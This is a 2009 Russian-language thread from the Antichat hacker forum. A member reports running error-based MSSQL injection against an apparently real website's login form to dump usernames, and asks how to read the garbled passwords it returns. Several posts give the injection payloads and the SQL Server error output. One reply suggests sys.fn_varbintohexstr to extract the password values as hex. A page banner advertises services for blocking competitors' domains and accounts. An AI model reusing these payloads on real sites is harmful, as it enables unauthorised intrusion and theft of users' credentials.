mssql injection

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
mssql injection

Опции темы

Поиск в этой теме

Опции просмотра

mssql injection

01.08.2009, 00:25

Moerto

Новичок

Регистрация: 22.07.2009

Сообщений: 7

С нами: 8845571

Репутация: 0

mssql injection

Привет, у меня проблема с mssql инйэкцию. Я в один сайт нашол "vulnerable" (ньезнаю как ето сказать по руски) логин форму. Я палучил юзернеими и другую информацию от датабази с такие команди:

Код:

' and 1=convert(int, (select top 1...))--

Когда я хачу палучиц парольи с такую методу я палучаю такие парольи - ÅÆÅÆ .

Код:

' and 1=convert(varchar, (select top 1 Password from Users where Username='foundusername'))--

Код:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'  [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'ª·¨©»¯ ' to a column of data type int.

Парольи можно быть в арабиц енкодинг, я попробовал поменьять бровсер енкодинг и без прогреса. Спасибо.
P.S. Я неоченъ харашо гаварю по руски, извиньице.

𝕏 Twitter Reddit Telegram Копировать ссылку

01.08.2009, 00:39

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

вообще если даже в арабской кодировке пароли то они должны нормально отображаться в браузере
это у всех юзеров так пароли выглядят?

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

01.08.2009, 01:24

Moerto

Новичок

Регистрация: 22.07.2009

Сообщений: 7

С нами: 8845571

Репутация: 0

дa

01.08.2009, 06:39

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

С нами: 9154406

Репутация: 2221

Цитата:

Сообщение от Spyder

Кстати часто очень бывает что абра кадабра вылазиет.
Тот же эллементарный 1' or 1=@@version.
Вроде слов много вылазиет, но абра кадабра.
Может знаешь что в чём проблема?

01.08.2009, 19:10

Moerto

Новичок

Регистрация: 22.07.2009

Сообщений: 7

С нами: 8845571

Репутация: 0

Microsoft SQL Server 2000 -

8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2

(Build 3790: Service Pack 1)

02.08.2009, 05:51

_>SubDeviL<_

Познающий

Регистрация: 22.06.2008

Сообщений: 53

С нами: 9414328

Репутация: 11

select+top+1+sys.fn_varbintohexstr(password)+from+ Users+where+Username="foundusername"

юзай так, тобишь функцию sys.fn_varbintohexstr().

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
mssql injection	pop_korn	Video.Antichat	0	07.02.2007 14:43

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules